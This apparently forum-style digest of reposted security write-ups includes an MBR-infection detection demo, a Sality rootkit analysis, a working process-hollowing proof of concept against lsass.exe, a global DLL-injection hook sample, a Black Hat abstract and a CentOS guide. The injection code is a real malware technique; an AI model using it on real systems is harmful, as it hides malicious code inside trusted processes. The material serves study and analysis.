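    static const uint8_t stub[] = { 0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C }; /* xor ax,ax ; mov ss,ax ; mov sp,7C00h */
    memset(mbr, 0, MBR_SIZE);
    memcpy(mbr, stub, sizeof stub);
    uint8_t *e = mbr + MBR_PART_TABLE;
    e[0] = 0x80;                       /* active */
    e[4] = 0x07;                       /* NTFS */
    wr32(e + 8, 63);                   /* starts at LBA 63 */
    wr32(e + 12, 2097152);             /* 1 GiB of 512-byte sectors */
    mbr[510] = 0x55; mbr[511] = 0xAA;
}

/* Constructed infected MBR: partition table left as-is (assumed), first bytes
 * replaced by a jump into planted code, and the extension offset written at 0x190. */
void build_infected_mbr(uint8_t *mbr, const uint8_t *clean, uint16_t ext_offset)
{
    static const uint8_t hook[] = { 0xEB, 0x4E, 0x90 };   /* jmp short 0x50 ; nop (placeholder) */
    memcpy(mbr, clean, MBR_SIZE);
    memcpy(mbr, hook, sizeof hook);
    memset(mbr + 0x50, 0x90, 0x40);    /* stand-in for the injected loader body */
    mbr[MBR_EXT_OFFSET] = (uint8_t)ext_offset;
    mbr[MBR_EXT_OFFSET + 1] = (uint8_t)(ext_offset >> 8);
}

int main(void)
{
    uint8_t clean[MBR_SIZE], live[MBR_SIZE];
    struct mbr_part parts[4];
    size_t first;
    build_clean_mbr(clean);
    build_infected_mbr(live, clean, 0x1234);
    printf("partitions in use: %d (type 0x%02x at LBA %u)\n", mbr_parse(live, parts), parts[0].type, parts[0].lba_start);
    int d = mbr_code_diff(live, clean, &first);
    printf("boot code differs in %d bytes, first at 0x%zx; word at 0x190 = 0x%04x\n", d, first, mbr_ext_pointer(live));
    return 0;
}
```

On a real machine the live sector comes from the physical disk (for example \\.\PhysicalDrive0 on Windows) and the reference from a known-good image of the same Windows version; a clean XP-era MBR has zeros around 0x190, so a non-zero word there is worth a look, but the diff against a reference is the check that does not depend on that layout detail.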
-
[h=1]Sality rootkit analysis[/h]
Sality is a well-known family of file infectors (PE infectors, or simply viruses). As malware it has a very long history of evolution, since 2003. Its latest versions contain a rootkit on board to complicate detection by AV scanners. The driver has the following features:
- Process termination via NtTerminateProcess;
- Blocking access to some AV web resources via IP filtering;
- Small size, ~5 KB.
According to the analysis, the rootkit targets Windows from NT4 up to Vista. It should be said in advance that this rootkit is not NEW and does not contain the features that modern rootkits or bootkits have. The researched version of the rootkit has been seen in the wild since the beginning of 2010.
The rootkit creates a device with the name:
\Device\amsint32
\DosDevices\amsint32
and this is a sign of infection. The rootkit contains the usual, most famous way of process killing, which is used by almost all "old-school" rootkits.
Sality uses the old model of IP filtering to block access to web resources that belong to AV vendors. This technique is called IP Filtering. More info: Windows 2000 Filter-Hook Driver example NT networking & kernel mode: drivers, articles, sources and MSDN http://msdn.microsoft.com/en-us/library/windows/hardware/ff548976(v=vs.85).aspx. List of affected vendors: (screenshot)
This feature requires the driver to register a callback function which is called for IP packets. This function decides what to do with the packet: forward it or drop it. The registered callback, fnFilterHookIP, looks for the presence of AV vendor strings in the packet data. In case of a hit it forces the IP driver to drop the packet. Encrypted AV vendor strings in its body: (screenshot)
Detection ratio: (screenshot)
SHA256: e0b193d47609c9622aa018e81da69c24b921f2ba682f3e18646a0d09ec63ac2b
SHA1: ef9a19ba89021179930888264290367b5d106a44
MD5: bf31a8d79f704f488e3dbcb6eea3b3e3
File size: 5157 bytes
posted by https://twitter.com/artem_i_baranov
Posted 15th January by Artem
Source: Security/malware blog: Sality rootkit analysis
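An added example, not Sality's code and not from the original post: the decision a filter-hook callback of this kind makes, reduced to a plain function over raw IPv4 packets so it can be run and tested in user mode. It locates the TCP or UDP payload and drops the packet if the payload contains any of the blocked strings, forwarding everything else, including packets it cannot parse. The rootkit's real vendor list appears only as a screenshot in the post, so the strings here are placeholders; the packets are constructed, with checksums left zero.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { PF_FORWARD = 0, PF_DROP = 1 };   /* the two outcomes a filter hook can return */

/* Locate the transport payload of an IPv4 packet. Returns its length, or -1
 * for truncated or non-TCP/UDP packets (which the filter leaves alone). */
static long ipv4_payload(const uint8_t *pkt, size_t len, const uint8_t **payload)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0F) * 4;
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || total > len || total < ihl) return -1;
    size_t thdr;
    if (pkt[9] == 6) {                              /* TCP: data offset in upper nibble of byte 12 */
        if (total < ihl + 20) return -1;
        thdr = (size_t)(pkt[ihl + 12] >> 4) * 4;
        if (thdr < 20) return -1;
    } else if (pkt[9] == 17) {                      /* UDP: fixed 8-byte header */
        thdr = 8;
    } else {
        return -1;
    }
    if (ihl + thdr > total) return -1;
    *payload = pkt + ihl + thdr;
    return (long)(total - ihl - thdr);
}

/* Case-insensitive substring search over a byte buffer that may contain NULs. */
static int contains_ci(const uint8_t *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++) {
        size_t j = 0;
        while (j < m && tolower(hay[i + j]) == tolower((unsigned char)needle[j])) j++;
        if (j == m) return 1;
    }
    return 0;
}

/* The filter-hook decision: drop any packet whose payload mentions a blocked
 * name, forward everything else. `blocked` is a NULL-terminated list. */
enum verdict filter_packet(const uint8_t *pkt, size_t len, const char *const *blocked)
{
    const uint8_t *data;
    long n = ipv4_payload(pkt, len, &data);
    if (n <= 0) return PF_FORWARD;
    for (size_t i = 0; blocked[i] != NULL; i++)
        if (contains_ci(data, (size_t)n, blocked[i])) return PF_DROP;
    return PF_FORWARD;
}

/* Constructed IPv4/TCP packet to port 80 carrying `text` (checksums left zero). */
size_t build_tcp_packet(uint8_t *buf, size_t cap, const char *text)
{
    size_t plen = strlen(text), total = 20 + 20 + plen;
    if (total > cap || total > 0xFFFF) return 0;
    memset(buf, 0, total);
    buf[0] = 0x45;                                   /* IPv4, IHL = 5 */
    buf[2] = (uint8_t)(total >> 8);
    buf[3] = (uint8_t)total;
    buf[8] = 64;                                     /* TTL */
    buf[9] = 6;                                      /* protocol: TCP */
    buf[20 + 3] = 80;                                /* destination port 80 */
    buf[20 + 12] = 0x50;                             /* TCP data offset = 5 */
    memcpy(buf + 40, text, plen);
    return total;
}

/* Placeholder block list; the real vendor strings are only in the post's screenshot. */
static const char *const kBlocked[] = { "avvendor-a", "avvendor-b", NULL };

int main(void)
{
    uint8_t pkt[512];
    size_t n = build_tcp_packet(pkt, sizeof pkt, "GET /update HTTP/1.1\r\nHost: www.AVVendor-A.example\r\n\r\n");
    printf("AV update request: %s\n", filter_packet(pkt, n, kBlocked) == PF_DROP ? "DROP" : "FORWARD");
    n = build_tcp_packet(pkt, sizeof pkt, "GET / HTTP/1.1\r\nHost: example.org\r\n\r\n");
    printf("ordinary request:  %s\n", filter_packet(pkt, n, kBlocked) == PF_DROP ? "DROP" : "FORWARD");
    return 0;
}
```

Because the match is a plain substring search over the payload, the same logic also explains the visible symptom of the infection: any connection whose first data segment carries a vendor name (a Host header, a URL, a DNS query name) silently stalls, while traffic to the same address without that string passes.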
-
[h=2]New method of injection[/h]
[h=2]Introduction[/h]
I discovered a new method of injection (I don't know if it is really new) in a malware dropped by Duqu. So I want to share it with you and, as usual, write a p0c.
Edit: This method is not new; apparently it has been used by game cheats for years, but instead of ZwUnmapViewOfSection they use FreeLibrary.
[h=2]Injection Method[/h]
The malware in question is simply a keylogger, but it uses a nice trick for injecting into another process. First it creates (as usual) a suspended lsass.exe process via CreateProcess(). Then it gathers process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can it do with this address? If we look at the PEB struct:
    >dt nt!_PEB
       +0x000 InheritedAddressSpace : UChar
       +0x001 ReadImageFileExecOptions : UChar
       +0x002 BeingDebugged : UChar
       +0x003 SpareBool : UChar
       +0x004 Mutant : Ptr32 Void
       +0x008 ImageBaseAddress : Ptr32 Void
It gets the ImageBaseAddress at offset 0x8 by reading it with ReadProcessMemory(). First it creates a section with ZwCreateSection(); then, in the current process (not in the suspended lsass.exe), it calls ZwMapViewOfSection() with the BaseAddress argument equal to 0, copies the old lsass.exe PE image into it and modifies the entry point. It does the same operation on the lsass.exe process, but with BaseAddress equal to the ImageBase. But wait! If we read the documentation of ZwMapViewOfSection, we would expect an NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES. The answer is no, because before the second ZwMapViewOfSection it performs ZwUnmapViewOfSection() with BaseAddress equal to ImageBaseAddress on the lsass.exe process. And if you wonder, "Wait, what!? Is that possible?", the answer is yes. With this trick the malware is able to replace the WHOLE PE image of the suspended process.
[h=2]p0c[/h]
So I decided to rewrite this trick, to understand well the stuff done by the malware (maybe you will better understand what I explained before).
Tested under Windows XP SP3 and Windows Seven SP1 (32 bits).
Main.c:

    #include "main.h"

    /* Read AddressOfEntryPoint out of the PE headers copied from the target. */
    int get_entrypoint(char *read_proc)
    {
        IMAGE_DOS_HEADER *idh = NULL;
        IMAGE_NT_HEADERS *inh = NULL;

        idh = (IMAGE_DOS_HEADER*)read_proc;
        inh = (IMAGE_NT_HEADERS *)((BYTE*)read_proc + idh->e_lfanew);
        printf("Entrypoint = %x\n", inh->OptionalHeader.AddressOfEntryPoint);
        return (inh->OptionalHeader.AddressOfEntryPoint);
    }

    int main(void)
    {
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        WCHAR path_lsass[MAX_PATH];   /* wide buffer: ExpandEnvironmentStringsW writes WCHARs, not bytes */
        PROCESS_BASIC_INFORMATION pbi;
        DWORD nb_read;
        DWORD ImageBase;
        HANDLE hsect;
        NTSTATUS stat;
        PVOID BaseAddress = NULL;
        DWORD oep;

        memset(&si, 0, sizeof(STARTUPINFO));
        si.cb = sizeof(STARTUPINFO);
        memset(&pi, 0, sizeof(PROCESS_INFORMATION));
        memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION));

        /* 1. Start lsass.exe suspended: its image is mapped but nothing has run yet. */
        ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\lsass.exe", path_lsass, MAX_PATH);
        wprintf(L"[+] New Path for lsass.exe = %s\n", path_lsass);
        if (!CreateProcess(path_lsass, NULL, NULL, NULL, FALSE,
                           CREATE_SUSPENDED | DETACHED_PROCESS | CREATE_NO_WINDOW,
                           NULL, NULL, &si, &pi))
        {
            printf("[-] CreateProcessW failed\n");
            printf("LastError = %x\n", GetLastError());
            return (-1);
        }

        /* 2. Resolve the native API exports from ntdll. */
        ZwQueryInformationProcess = (long (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))
            GetProcAddress(GetModuleHandleA("ntdll"), "ZwQueryInformationProcess");
        ZwMapViewOfSection = (long (__stdcall *)(HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
            GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
        ZwUnmapViewOfSection = (long (__stdcall *)(HANDLE, PVOID))
            GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
        ZwCreateSection = (long (__stdcall *)(PHANDLE, ACCESS_MASK, PDWORD, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
            GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
        if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL
            || ZwUnmapViewOfSection == NULL || ZwCreateSection == NULL)
        {
            printf("[-] GetProcAddress failed\n");
            return (-1);
        }

        /* 3. PEB -> ImageBaseAddress (offset 0x8) of the suspended process. */
        if (ZwQueryInformationProcess(pi.hProcess, 0 /* ProcessBasicInformation */, &pbi,
                                      sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0)
        {
            printf("[-] ZwQueryInformation failed\n");
            return (-1);
        }
        printf("[+] UniqueProcessID = 0x%x\n", pbi.UniqueProcessId);
        if (!ReadProcessMemory(pi.hProcess, (BYTE*)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) || nb_read != 4)
        {
            printf("[-] ReadProcessMemory failed\n");
            return (-1);
        }
        printf("[+] ImageBase = 0x%x\n", ImageBase);

        /* 4. Read the headers and first pages of the original image and locate its entry point. */
        char read_proc[0x6000];
        if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x6000, &nb_read) || nb_read != 0x6000)
        {
            printf("[-] ReadProcessMemory failed\n");
            return (-1);
        }
        printf("(dbg) Two first bytes : %c%c\n", read_proc[0], read_proc[1]);
        oep = get_entrypoint(read_proc);

        /* 5. Create a pagefile-backed section and map a view of it into our own process. */
        LARGE_INTEGER a;
        a.HighPart = 0;
        a.LowPart = 0x8EF6;
        if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
        {
            printf("[-] ZwCreateSection failed\n");
            printf("[-] NTSTATUS = %x\n", stat);
            return (-1);
        }
        SIZE_T size;
        size = 0x8000;
        BaseAddress = (PVOID)0;
        if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, 0, 0, NULL, &size,
                                       1 /* ViewShare */, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
        {
            printf("[-] ZwMapViewOfSection failed\n");
            printf("[-] NTSTATUS = %x\n", stat);
            return (-1);
        }

        /* 6. Fill the view with a copy of the image whose entry point now starts with INT3. */
        memset((BYTE*)read_proc + oep, 0xCC, 1);
        memcpy(BaseAddress, read_proc, 0x2000);

        /* 7. Unmap the original image from lsass.exe and map our section at the same base. */
        BaseAddress = (PVOID)ImageBase;
        printf("BaseAddress = %x\n", BaseAddress);
        ZwUnmapViewOfSection(pi.hProcess, BaseAddress);
        if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, 0, 0, NULL, &size,
                                       1 /* ViewShare */, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
        {
            printf("[-] ZwMapViewOfSection failed\n");
            printf("[-] NTSTATUS = %x\n", stat);
            system("pause");
            return (-1);
        }
        printf("BaseAddress = %x\n", BaseAddress);

        /* 8. Resume the main thread: it now executes the replaced image (INT3 at the OEP). */
        ResumeThread(pi.hThread);
        system("pause");
        return (0);
    }

And the include file, main.h:

    #include <stdio.h>
    #include <Windows.h>

    #if !defined NTSTATUS
    typedef LONG NTSTATUS, *PNTSTATUS;
    #endif

    #define STATUS_SUCCESS 0

    #if !defined PROCESSINFOCLASS
    typedef LONG PROCESSINFOCLASS;
    #endif

    #if !defined PPEB
    typedef struct _PEB *PPEB;
    #endif

    #if !defined PROCESS_BASIC_INFORMATION
    typedef struct _PROCESS_BASIC_INFORMATION {
        PVOID Reserved1;
        PPEB PebBaseAddress;
        PVOID Reserved2[2];
        ULONG_PTR UniqueProcessId;
        PVOID Reserved3;
    } PROCESS_BASIC_INFORMATION;
    #endif

    typedef struct _UNICODE_STRING {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
    } UNICODE_STRING, *PUNICODE_STRING;

    typedef struct _OBJECT_ATTRIBUTES {
        ULONG Length;
        HANDLE RootDirectory;
        PUNICODE_STRING ObjectName;
        ULONG Attributes;
        PVOID SecurityDescriptor;
        PVOID SecurityQualityOfService;
    } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

    typedef NTSTATUS (WINAPI * PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);

    /* Function pointers to the native API, filled in at runtime via GetProcAddress. */
    NTSTATUS (__stdcall *ZwQueryInformationProcess)(
        HANDLE ProcessHandle,
        PROCESSINFOCLASS ProcessInformationClass,
        PVOID ProcessInformation,
        ULONG ProcessInformationLength,
        PULONG ReturnLength OPTIONAL
    );

    NTSTATUS (__stdcall *ZwCreateSection)(
        PHANDLE SectionHandle,
        ACCESS_MASK DesiredAccess,
        PDWORD ObjectAttributes OPTIONAL,
        PLARGE_INTEGER MaximumSize OPTIONAL,
        ULONG SectionPageProtection,
        ULONG AllocationAttributes,
        HANDLE FileHandle OPTIONAL
    );

    NTSTATUS (__stdcall *ZwMapViewOfSection)(
        HANDLE SectionHandle,
        HANDLE ProcessHandle,
        OUT PVOID *BaseAddress,
        ULONG_PTR ZeroBits,
        SIZE_T CommitSize,
        PLARGE_INTEGER SectionOffset,
        PSIZE_T ViewSize,
        DWORD InheritDisposition,
        ULONG AllocationType,
        ULONG Win32Protect
    );

    NTSTATUS (__stdcall *ZwUnmapViewOfSection)(
        HANDLE ProcessHandle,
        PVOID BaseAddress
    );

So for the p0c I just put an INT3 at the entry point of lsass.exe, and here is the result: (screenshot)
[h=2]Conclusion[/h]
This method is really fun because it doesn't use SetThreadContext() to update EIP before resuming thread execution.
Source: w4kfu's bl0g
-
[h=1]Analyzing Unknown Malware[/h]
[h=3]#1 Dropper of kernel-mode stealer[/h]
[h=3]#Offtopic The case of the gethostbyname() exception[/h]
[h=3]#2 Disclosure of an interesting Botnet - The Executable (Part 1)[/h]
[h=3]#2 Disclosure of an interesting Botnet - The Server (Part 2)[/h]
[h=3]#3 Disclosure of another 0day malware - Initial Dropper and Downloader (Part 1)[/h]
[h=3]#3 Disclosure of another 0day malware - Analysis of 2nd Dropper and 3rd Dropper (Part 2)[/h]
[h=3]#3 Disclosure of another 0day malware - Analysis of the final Payload (Part 3)[/h]
[h=3]#3 Disclosure of another 0day malware - Update and Additional Information[/h]
[h=3]#4 Analysis of an uncommon Downloader[/h]
[h=3]#5 South Korea Incident - New Malware samples[/h]
[h=3]#6 South Korea Incident - Analysis of a tiny Downloader[/h]
[h=3]#7 Brief description of a signed Adware/PUP Downloader[/h]
[h=3]#8 Back to the future - Analysis of an old Downloader[/h]
Source: Analyzing Unknown Malware
-
Blackhat Eu 2013 - Hacking Video Conferencing Systems
Description: High-end videoconferencing systems are widely deployed at critical locations such as corporate meeting rooms or boardrooms. Many of these systems are reachable from the Internet or via the telephone network, while in many cases the security considerations are limited to the secure deployment and configuration. We conducted a case study on Polycom HDX devices in order to assess the current state of security on those devices. After analyzing the software update file format and showing how to get system-level access to the otherwise closed devices, we describe how to set up a proper vulnerability development environment which lays the groundwork for future security research. We demonstrate the feasibility of remotely compromising Polycom HDX devices over the network by implementing an exploit for one of the vulnerabilities we identified in the H.323 stack of the current software version, which allows us to compromise even firewalled devices as long as the H.323 port is reachable. Our attack does not require the auto-answer feature for incoming calls to be turned on. We conclude with some thoughts about post-exploitation and describe possible ways to control attached peripherals such as the video camera and microphone, which could be used to build a surveillance rootkit.
For more information please visit: Black Hat | Europe 2013 - Briefings
Source: Blackhat Eu 2013 - Hacking Video Conferencing Systems
-
[h=1]Creating Global Api Hook Using Windows Hook[/h]
[h=3]zwclose7[/h]
Windows hooks allow you to inject a DLL into all GUI processes that are running in the same session. This allows you to inject a hook DLL into most running processes. Windows hooks can't inject a DLL into system processes or service processes. I have just written a hook DLL to show you how to use a Windows hook to inject a DLL into GUI processes. The DLL has an exported function, SetHook. Use the rundll32 tool to execute this function. Once the function is executed, it sets the Windows hook and injects the DLL into all GUI processes. When the DLL is injected, it hooks the InternetConnectW function to block all websites that contain the word "google" in the URL. To install the hook using the rundll32 tool, use the following command line:
    rundll32 <DllPath>,SetHook
When the rundll32.exe process is terminated, the Windows hook is removed, and the hooked InternetConnectW is also unhooked. I am using my API hooking header for this project.
    #include <stdio.h>
    #include <Windows.h>
    #include <WinInet.h>
    #include "apihook.h"

    typedef HINTERNET (WINAPI *pInternetConnectW)(HINTERNET, LPCWSTR, INTERNET_PORT, LPCWSTR, LPCWSTR, DWORD, DWORD, DWORD_PTR);

    pInternetConnectW fnInternetConnectW;   /* trampoline to the original InternetConnectW */
    HINSTANCE hInst;                        /* this DLL's module handle, needed by SetWindowsHookEx */
    API_HOOK Hook;

    /* WH_CALLWNDPROC hook procedure. It only passes the message on; its real job is to
       give SetWindowsHookEx a reason to load this DLL into every GUI process. */
    extern "C" __declspec(dllexport) LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
    {
        return CallNextHookEx(NULL, nCode, wParam, lParam);
    }

    /* Entry point used by "rundll32 <DllPath>,SetHook". The hook lives as long as this process. */
    extern "C" __declspec(dllexport) void SetHook()
    {
        SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, hInst, 0);
        Sleep(INFINITE);
    }

    /* Replacement for InternetConnectW: refuse any server name containing "google". */
    HINTERNET WINAPI HookInternetConnectW(HINTERNET hInternet, LPCWSTR ServerName, INTERNET_PORT InternetPort,
                                          LPCWSTR UserName, LPCWSTR Password, DWORD dwService, DWORD dwFlags, DWORD_PTR dwContext)
    {
        if (ServerName && wcsstr(ServerName, L"google"))
        {
            OutputDebugString("Your request to access Google has been denied!");
            SetLastError(ERROR_ACCESS_DENIED);
            return NULL;
        }
        return fnInternetConnectW(hInternet, ServerName, InternetPort, UserName, Password, dwService, dwFlags, dwContext);
    }

    BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)
    {
        char szModuleName[260], str[1024];
        hInst = hModule;
        switch (dwReason)
        {
        case DLL_PROCESS_ATTACH:
            GetModuleFileName(NULL, szModuleName, 260);
            sprintf(str, "Hook DLL loaded into process %s (%d)", szModuleName, GetCurrentProcessId());
            OutputDebugString(str);
            /* install the inline hook on wininet!InternetConnectW inside this process */
            InitAPIHook(&Hook, "wininet.dll", "InternetConnectW", HookInternetConnectW);
            fnInternetConnectW = (pInternetConnectW)Hook.OrigFunction;
            StartAPIHook(&Hook);
            break;
        case DLL_PROCESS_DETACH:
            UnhookAPIHook(&Hook);
            RemoveAPIHook(&Hook);
            break;
        }
        return TRUE;
    }

[h=4]Attached Files[/h]
WindowsHook.zip (270.07 KB)
Source: Creating Global Api Hook Using Windows Hook - Source Codes - rohitab.com - Forums
-
[h=3]CentOS 6.4 Linux Installation Guide Step by Step[/h]
Overview: This tutorial will help system administrators install CentOS 6.4 Linux on servers. CentOS (Community Enterprise Operating System) is a Linux distribution which attempts to provide a free enterprise-class computing platform with 100% binary compatibility with its upstream source, Red Hat Enterprise Linux (RHEL).
Note: First download the ISO files (http://centos.mirror.net.in/centos/6.4/isos/x86_64/) for your server's architecture and write the ISO file to a DVD.
Installation steps:
Step 1: Set your server's BIOS to boot from CD/DVD. Select the "Install or upgrade an existing system" option, as shown below.
Step 2: Select "Skip" at the media test.
Step 3: Click Next on the welcome screen.
Step 4: Select English and click Next.
Step 5: Select the appropriate keyboard (U.S. English in my case). Click Next.
Step 6: Select the "Basic Storage Devices" option if you want to install the OS locally on the attached hard disk. Click Next.
Step 7: Select the "Yes, discard any data" option.
Step 8: Set the hostname, and click "Configure Network" if you want to configure the network during installation.
Step 9: Select the time zone for your region. Click Next.
Step 10: Set the root password. Click Next.
Step 11: Select the install type; in my case I am using "Use All Space". If you want to create your own partition table, select the "Create Custom Layout" option. Click Next.
Step 12: Verify the partition scheme and click Next.
Step 13: Click Format.
Step 14: Click "Write changes to disk".
Step 15: Set the bootloader options. Click Next.
Step 16: Select the software you want to install; in my case I am using "Basic Server". Click Next. Note: if you want to select the software manually, click "Customize Now" and select your packages.
Step 17: The installation starts, as shown below.
Step 18: Installation completed; reboot your server now.
Step 19: Welcome login screen (run level 3). Log in as root with the password you set.
Source: CentOS 6.4 Linux Installation Guide Step by Step